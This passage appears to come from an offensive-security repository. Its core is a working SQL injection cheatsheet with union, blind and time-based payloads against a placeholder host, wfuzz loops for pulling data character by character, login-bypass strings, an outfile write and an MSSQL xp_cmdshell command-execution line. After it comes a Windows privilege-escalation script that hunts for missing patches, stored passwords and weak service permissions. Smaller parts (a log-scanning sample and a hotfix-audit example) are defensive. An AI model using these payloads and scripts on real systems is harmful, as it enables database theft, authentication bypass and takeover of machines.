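10.0.0.5 - - [12/Sep/2017:10:00:03 +0000] "GET /index.php?id=1%20order%20by%203 HTTP/1.1" 200 5120
10.0.0.5 - - [12/Sep/2017:10:00:03 +0000] "GET /index.php?id=1%20order%20by%204 HTTP/1.1" 200 1843
10.0.0.5 - - [12/Sep/2017:10:00:09 +0000] "GET /index.php?id=-1+union+select+1,2,@@version HTTP/1.1" 200 5201
10.0.0.5 - - [12/Sep/2017:10:00:15 +0000] "GET /index.php?id=-1%2520union%2520select%25201,2,group_concat(table_name)%2520from%2520information_schema.tables HTTP/1.1" 200 5388
10.0.0.9 - - [12/Sep/2017:10:01:00 +0000] "GET /index.php?id=42 HTTP/1.1" 200 5120
10.0.0.9 - - [12/Sep/2017:10:01:05 +0000] "GET /search.php?q=order+by+date HTTP/1.1" 200 2201
"""

if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for rec in scan_log(lines):
        print(rec["ip"], rec["status"], ",".join(rec["hits"]), rec["path"])
    print("column-counting sweeps:", order_by_sweeps(lines))
```

The response-size drop on the `order by 4` line is the signal the cheatsheet's `wfuzz` sweep looks for; the sweep detector keys on the run of distinct column numbers from one client rather than on the size, so it also works when the sizes happen to match.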

Determine back-end query number of columns with error-based string SQL command injection
```
http://meh.com/index.php?id=1 order by <number>
```

Determine back-end query number of columns by observing `http response size` with `wfuzz` in error-based integer SQL command injection
```bash
wfuzz -c -z range,1-10 "http://meh.com/index.php?id=1 order by FUZZ"
```

Identify webpage-printable union columns by providing a false value to the back-end query with error-based integer SQL command injection. This injection depends on the number of columns identified by the `order by` clause
```
http://meh.com/index.php?id=-1 union select 1,2,3,...
```

Dump the content of a table into the filesystem
```
http://meh.com/index.php?id=-1')) union select <column>, <column> from <table> into outfile "<path>" --+
```

Print back-end SQL version with error-based integer SQL command injection, assuming column 3 content gets displayed on the webpage
```
http://meh.com/index.php?id=-1 union select 1,2,@@version,4,...
```

Print the user running the query to access the back-end database server with error-based integer SQL command injection
```
http://meh.com/index.php?id=-1 union select 1,2,user(),4,...
```

Print database name with error-based integer SQL command injection
```
http://meh.com/index.php?id=-1 union select 1,2,database(),4,...
```

Print database directory with error-based integer SQL command injection
```
http://meh.com/index.php?id=-1 union select 1,2,@@datadir,4,...
```

Print table names with error-based integer SQL command injection
```
http://meh.com/index.php?id=-1 union select 1,2,group_concat(table_name),4,... from information_schema.tables where table_schema=database()
```

Print column names with error-based integer SQL command injection
```
http://meh.com/index.php?id=-1 union select 1,2,group_concat(column_name),4,... from information_schema.columns where table_name='<table_name>'
```

Print content of a column with error-based integer SQL command injection
```
http://meh.com/index.php?id=-1 union select 1,2,group_concat(<column_name>),4,... from <table_name>
```

Use an `and` clause as a substitute for regular comments such as `--+`, `#`, and `/* */` with error-based string SQL command injection
```
http://meh.com/index.php?id=1' and '1
```
Determine database name with boolean-based blind SQL injection with `substr()`
```
http://meh.com/index.php?id=1' and (substr(database(),<offset>,<length>))='<string>' --+
```

Determine database name with boolean-based blind SQL injection by observing `http response size` with a combination of `substr()` and `wfuzz`, assuming the database name does not include special characters
```bash
for i in $(seq 1 10); do wfuzz -c -z list,a-b-c-d-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t-u-v-w-x-y-z --hw=<word_count> "http://meh.com/index.php?id=1' and (substr(database(),$i,1))='FUZZ' --+";done
```
Determine database name with boolean-based blind SQL injection by observing `http response size` with `substr()`, `ascii()` and `wfuzz`. The below range is the standard ASCII characters (32-127)
```bash
for i in $(seq 1 10); do wfuzz -c -z range,32-127 --hw=<word_count> "http://meh.com/index.php?id=1' and (ascii(substr(database(),$i,1)))=FUZZ --+";done
```

Determine table name with boolean-based blind SQL injection by observing `http response size` with `substr()`, `ascii()`, and `wfuzz`. The below range is the standard ASCII characters (32-127)
```bash
for i in $(seq 1 10); do wfuzz -c -z range,32-127 --hw=<word_count> "http://meh.com/index.php?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),$i,1)))=FUZZ --+";done # increment limit first argument by 1 to get the next available table name
```

Determine column name with boolean-based blind SQL injection by observing `http response size` with `substr()`, `ascii()`, and `wfuzz`. The below range is the standard ASCII characters (32-127)
```bash
for i in $(seq 1 10); do wfuzz -c -z range,32-127 --hw=<word_count> "http://meh.com/index.php?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name='<table_name>' limit 0,1),$i,1)))=FUZZ --+";done # increment limit first argument by 1 to get the next available column name
```
Boolean-based blind SQL command injection demo

![alt text](https://j.gifs.com/W77p8o.gif)

Confirm time-based blind SQL injection using the `sleep()` function
```
http://meh.com/index.php?id=1' and sleep(10) --+
```

Determine database version with time-based blind SQL injection using `sleep()`, `like""`, and conditional `if`, assuming the back-end database is running version 5
```
http://meh.com/index.php?id=1' and if((select version()) like "5%", sleep(10), null) --+
```

Determine database name with time-based blind SQL injection by observing `http response time` with `substr()`, `ascii()`, and `wfuzz`. The below range is the standard ASCII characters (32-127)
```bash
for i in $(seq 1 10); do wfuzz -v -c -z range,32-127 "http://meh.com/index.php?id=1' and if((ascii(substr(database(),$i,1)))=FUZZ, sleep(10), null) --+";done > <output_file> && grep "0m9" <output_file>
```

Determine table name with time-based blind SQL injection by observing `http response time` with `substr()`, `ascii()`, `if`, and `wfuzz`. The below range is the standard ASCII characters (32-127)
```bash
for i in $(seq 1 10); do wfuzz -v -c -z range,32-127 "http://meh.com/index.php?id=1' and if((select ascii(substr(table_name,$i,1))from information_schema.tables where table_schema=database() limit 0,1)=FUZZ, sleep(10), null) --+";done > <output_file> && grep "0m9" <output_file> # increment limit first argument by 1 to get the next available table name
```
Determine column name with time-based blind SQL injection by observing `http response time` with `substr()`, `ascii()`, `if`, and `wfuzz`. The below range is the standard ASCII characters (32-127)
```bash
for i in $(seq 1 10); do wfuzz -v -c -z range,32-127 "http://meh.com/index.php?id=1' and if((select ascii(substr(column_name,$i,1))from information_schema.columns where table_name='<table_name>' limit 0,1)=FUZZ, sleep(10), null) --+";done > <output_file> && grep "0m9" <output_file> # increment limit first argument by 1 to get the next available column name
```

Extract column content with time-based blind SQL injection by observing `http response time` with `substr()`, `ascii()`, `if`, and `wfuzz`. The below range is the standard ASCII characters (32-127)
```bash
for i in $(seq 1 10); do wfuzz -v -c -z range,0-10 -z range,32-127 "http://meh.com/index.php?id=1' and if(ascii(substr((select <column_name> from <table_name> limit FUZZ,1),$i,1))=FUZ2Z, sleep(10), null) --+";done > <output_file> && grep "0m9" <output_file> # change <column_name> to get the content of the next column
```
Time-based blind SQL command injection with bash magic demo

![alt text](https://j.gifs.com/2vv2J1.gif)

Hope those were helpful! Now here are a couple of login bypass commands that worked for me
```sql
meh' OR 3=3;#
meh' OR 2=2 LIMIT 1;#
meh' OR 'a'='a
meh' OR 1=1 --+
```
Sometimes you'll run into a Microsoft SQL server that has `xp_cmdshell` turned on; here's the syntax for remote code execution
```sql
meh' exec master..xp_cmdshell '<command>' --
```

Final notes!
- If you made it this far then you know that most of the SQL command injection examples are based on `MySQL`, and I don't plan on making any for `MSSQL` because I'm lazy
- Use your proxy of choice to bypass client-side JavaScript restrictions
- The `order by` clause works only with regular comments such as `--+`
- Update the ASCII range to include special characters if you're going after the users table
- `MySQL` does not have permission to overwrite an existing file, so make sure you use a new filename every single time with `outfile`.
- Make sure the vulnerable parameter has a false value when working with union-based SQL command injection
- It's worth noting that all of the examples in this cheatsheet were HTTP `GET` requests, and it shouldn't be that hard to replicate them with HTTP `POST` requests once you grasp the core concepts.
- You need to input a true value to the vulnerable parameter for `and sleep()` to work; otherwise go with `or sleep()`. Here's an example for the sake of clarification
```
http://meh.com/index.php?id=' and sleep(1) #
http://meh.com/index.php?id=' or sleep(1) #
```
To do list
- Python or bash script to convert ASCII to text after data extraction (grep output in this case)
- Create outfile && loadfile templates

--------------------------------------------------------------------------------
/Windows/WinPrivCheck.bat:
--------------------------------------------------------------------------------
@echo off

rem #---------------------------------------------------------------------------------#
rem # Name         = Windows Privilege Escalation Check v1.0                          #
rem # Reference    = http://www.fuzzysecurity.com/tutorials/16.html                   #
rem # Author       = @ihack4falafel                                                   #
rem # Date         = 9/18/2017                                                        #
rem # Tested On    = Windows XP SP3 - Professional                                    #
rem #                Windows 7 SP1 - Enterprise                                       #
rem #                Windows 10 - Professional                                        #
rem # Usage        = WinPrivCheck.bat                                                 #
rem # Requirements = accesschk.exe(old version) - sysinternals                        #
rem #---------------------------------------------------------------------------------#


@echo off
rem Used rem instead of echo for cleaner output.
@echo on

rem #----------#
rem # Hostname #
rem #----------#

@echo off

hostname

@echo on

rem #----------#
rem # Username #
rem #----------#

@echo off

echo %username% 2>NUL
whoami 2>NUL
echo %userprofile% 2>NUL

@echo on

rem #------------#
rem # OS Version #
rem #------------#

@echo off

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

@echo on

rem #--------------------#
rem # Installed Software #
rem #--------------------#

@echo off

wmic product get Name, Version

@echo on

rem #-----------------#
rem # Available Users #
rem #-----------------#

@echo off

net users

@echo on

rem #----------------#
rem # Network Config #
rem #----------------#

@echo off

ipconfig /all

@echo on

rem #--------------#
rem # Route Config #
rem #--------------#

@echo off

route print

@echo on

rem #-----------#
rem # ARP Cache #
rem #-----------#

@echo off

arp -a

@echo on

rem #---------------------#
rem # Network Connections #
rem #---------------------#

@echo off

netstat -ano

@echo on

rem #-------------------#
rem # Firewall Settings #
rem #-------------------#

@echo off

netsh firewall show state
netsh firewall show config

@echo on

rem #------------------#
rem # Running Services #
rem #------------------#

@echo off

net start

@echo on

rem #------------------------#
rem # Local PrivEsc Exploits #
rem #------------------------#

@echo off

rem Given this script is for all versions of Windows, cross-reference the results with the matrix below to avoid false positives.


rem #----------------------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem #    Exploits Index    |   2K    |  XP   |  2K3  |   2K8   |  Vista  |  7  |                         Title                          |
rem #----------------------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB2592799 | MS11-080 |    X    |  SP3  |  SP3  |    X    |    X    |  X  | afd.sys - Local privilege Escalation                   |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB3143141 | MS16-032 |    X    |   X   |   X   |  SP1/2  |   SP2   | SP1 | Secondary Logon - Local privilege Escalation           |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB2393802 | MS11-011 |    X    | SP2/3 |  SP2  |   SP2   |  SP1/2  | SP0 | WmiTraceMessageVa - Local privilege Escalation         |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB982799  | MS10-059 |    X    |   X   |   X   |   ALL   |   ALL   | SP0 | Chimichurri - Local privilege Escalation               |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB979683  | MS10-021 |   SP4   | SP2/3 |  SP2  |   SP2   | SP0/1/2 | SP0 | Windows Kernel - Local privilege Escalation            |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB2305420 | MS10-092 |    X    |   X   |   X   | SP0/1/2 |  SP1/2  | SP0 | Task Scheduler - Local privilege Escalation            |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB981957  | MS10-073 |    X    | SP2/3 |  SP2  |   SP2   |  SP1/2  | SP0 | Keyboard Layout - Local privilege Escalation           |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB4013081 | MS17-017 |    X    |   X   |   X   |   SP2   |   SP2   | SP1 | Registry Hive Loading - Local privilege Escalation     |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB977165  | MS10-015 |   ALL   |  ALL  |  ALL  |   ALL   |   ALL   | ALL | User Mode to Ring - Local privilege Escalation         |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB941693  | MS08-025 |   SP4   |  SP2  | SP1/2 |   SP0   |  SP0/1  |  X  | win32k.sys - Local privilege Escalation                |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB920958  | MS06-049 |   SP4   |   X   |   X   |    X    |    X    |  X  | ZwQuerySysInfo - Local privilege Escalation            |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB914389  | MS06-030 |   ALL   |  SP2  |   X   |    X    |    X    |  X  | Mrxsmb.sys - Local privilege Escalation                |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB908523  | MS05-055 |   SP4   |   X   |   X   |    X    |    X    |  X  | APC Data-Free - Local privilege Escalation             |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB890859  | MS05-018 |  SP3/4  | SP1/2 |   X   |    X    |    X    |  X  | CSRSS - Local privilege Escalation                     |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB842526  | MS04-019 | SP2/3/4 |   X   |   X   |    X    |    X    |  X  | Utility Manager - Local privilege Escalation           |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB835732  | MS04-011 | SP2/3/4 | SP0/1 |   X   |    X    |    X    |  X  | LSASS service BoF - Remote Code Execution              |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB841872  | MS04-020 |   SP4   |   X   |   X   |    X    |    X    |  X  | POSIX - Local Privilege Escalation                     |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB2975684 | MS14-040 |    X    |   X   |  SP2  |   SP2   |   SP2   | SP1 | afd.sys Dangling Pointer - Local Privilege Escalation  |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB3136041 | MS16-016 |    X    |   X   |   X   |  SP1/2  |   SP2   | SP1 | WebDAV to Address - Local Privilege Escalation         |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB3057191 | MS15-051 |    X    |   X   |  SP2  |   SP2   |   SP2   | SP1 | win32k.sys - Local Privilege Escalation                |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB2989935 | MS14-070 |    X    |   X   |  SP2  |    X    |    X    |  X  | TCP/IP - Local Privilege Escalation                    |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#
rem # KB2503665 | MS11-046 |    X    |  SP3  |  SP2  |  SP1/2  |  SP1/2  | SP1 | 'afd.sys' - Local Privilege Escalation                 |
rem #-----------#----------#---------#-------#-------#---------#---------#-----#--------------------------------------------------------#

rem Each line calls the :checkpatch subroutine at the end of the script with the hotfix ID and its bulletin.

call :checkpatch KB2592799 MS11-080
call :checkpatch KB3143141 MS16-032
call :checkpatch KB2393802 MS11-011
call :checkpatch KB982799 MS10-059
call :checkpatch KB979683 MS10-021
call :checkpatch KB2305420 MS10-092
call :checkpatch KB981957 MS10-073
call :checkpatch KB4013081 MS17-017
call :checkpatch KB977165 MS10-015
call :checkpatch KB941693 MS08-025
call :checkpatch KB920958 MS06-049
call :checkpatch KB914389 MS06-030
call :checkpatch KB908523 MS05-055
call :checkpatch KB890859 MS05-018
call :checkpatch KB842526 MS04-019
call :checkpatch KB835732 MS04-011
call :checkpatch KB841872 MS04-020
call :checkpatch KB2975684 MS14-040
call :checkpatch KB3136041 MS16-016
call :checkpatch KB3057191 MS15-051
call :checkpatch KB2989935 MS14-070
call :checkpatch KB2503665 MS11-046

@echo on

rem #-------------------------#
rem # File Transfer Utilities #
rem #-------------------------#

@echo off

cscript /?
powershell.exe /?
tftp /?

@echo on

rem #-----------------------------#
rem # Clear-text/base64 Passwords #
rem #-----------------------------#

@echo off

type c:\sysprep.inf
type c:\sysprep\sysprep.xml
type %WINDIR%\Panther\Unattend\Unattended.xml
type %WINDIR%\Panther\Unattended.xml
dir /s *pass*
dir /s *cred*
dir /s *vnc*
dir /s *.config

@echo on

rem #--------------#
rem # Backup Files #
rem #--------------#

@echo off

dir /s *backup*

@echo on

rem #----------------------------------#
rem # *.MSI Install - SYSTEM privilege #
rem #----------------------------------#

@echo off

rem This will only work if both registry keys contain "AlwaysInstallElevated" with a DWORD value of 1.
rem This setting will allow a low-privilege user to install any .MSI as SYSTEM!

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

@echo on

rem #------------------------#
rem # Unquoted Service Paths #
rem #------------------------#

@echo off

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

rem All commands from this point onward will require accesschk.exe
rem Make sure you have accesschk.exe (old version) in the same directory when you run the script!

@echo on

rem #---------------------#
rem # Vulnerable Services #
rem #---------------------#

@echo off

rem By default WinXP SP1 grants "Authenticated Users" SERVICE_ALL_ACCESS to "SSDPSRV" and "upnphost"!

accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Power Users" *
accesschk.exe /accepteula -uwcqv "Users" *

@echo on

rem #-------------------------------#
rem # Vulnerable Folder Permissions #
rem #-------------------------------#

@echo off

accesschk.exe /accepteula -uwdqs "Users" c:\
accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\

@echo on

rem #-----------------------------#
rem # Vulnerable File Permissions #
rem #-----------------------------#

@echo off

accesschk.exe /accepteula -uwqs "Users" c:\*.*
accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*

@echo on

rem #----------------#
rem # Happy Hunting! #
rem #----------------#

@echo off
goto :eof

rem Subroutine: %1 = hotfix ID (KB...), %2 = bulletin (MS..-...).
rem Greps the installed hotfix list for the ID and reports whether the patch is present.
:checkpatch
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"%~1" | find /i "%~1" 1>NUL
IF not errorlevel 1 (

echo %~2 patch is installed :(

) ELSE (

echo %~2 patch is NOT installed!

)
exit /b
--------------------------------------------------------------------------------
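An added example, not part of WinPrivCheck.bat or the repo: the hotfix audit the batch script performs with `wmic qfe` and `findstr`, written in Python so the matching logic can be run and tested offline. The KB/bulletin pairs are a subset of the script's matrix; the `wmic` output in the block is constructed sample data (including the filler ID `KB9999999`), not output from a real machine.

```python
"""Added example, not part of WinPrivCheck.bat: the hotfix audit the batch
script does with findstr, written in Python so the matching can be tested
offline. The KB -> bulletin pairs are a subset of the script's matrix; the
wmic output below is constructed sample data, not a real machine's."""
import re

# Subset of the KB / bulletin pairs the batch script checks (from its matrix).
PATCH_MATRIX = {
    "KB2592799": "MS11-080",
    "KB3143141": "MS16-032",
    "KB982799": "MS10-059",
    "KB977165": "MS10-015",
    "KB3057191": "MS15-051",
    "KB2503665": "MS11-046",
}

# Constructed sample of `wmic qfe get Caption,Description,HotFixID,InstalledOn`
# output. Two tracked hotfixes are present; KB9999999 is an unrelated filler.
SAMPLE_WMIC_QFE = """\
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=2592799  Security Update  KB2592799  10/12/2011
http://support.microsoft.com/?kbid=3057191  Security Update  KB3057191  5/13/2015
http://support.microsoft.com/?kbid=9999999  Update           KB9999999  1/1/2016
"""


def installed_hotfixes(wmic_output):
    """Collect HotFixID values as whole tokens (KB followed by digits).

    Whole-token matching means KB982799 does not match a longer ID that
    merely starts with the same digits, which a substring search would.
    """
    found = set()
    for line in wmic_output.splitlines()[1:]:  # skip the header row
        for token in line.split():
            if re.fullmatch(r"KB\d+", token, re.IGNORECASE):
                found.add(token.upper())
    return found


def audit(wmic_output, matrix=PATCH_MATRIX):
    """Map each bulletin to True (patch installed) or False (missing)."""
    present = installed_hotfixes(wmic_output)
    return {bulletin: kb in present for kb, bulletin in matrix.items()}


def missing_bulletins(wmic_output, matrix=PATCH_MATRIX):
    """Bulletins whose hotfix is absent, sorted; these need patching."""
    return sorted(b for b, ok in audit(wmic_output, matrix).items() if not ok)


if __name__ == "__main__":
    for bulletin, ok in audit(SAMPLE_WMIC_QFE).items():
        print(bulletin, "patch is installed" if ok else "patch is NOT installed!")
```

Feed it real `wmic qfe` output (or the equivalent `Get-HotFix` listing) and `missing_bulletins` is the patch backlog for that host. Two details worth keeping from the batch version: a hotfix being absent from the list only means the machine may still be exposed, and the version matrix above still decides whether a bulletin applies to that OS at all, which is why the script tells you to cross-reference it. Unlike `findstr /C:"KB..."`, which is a substring match, the token comparison here cannot be fooled by a longer ID that starts with the same digits.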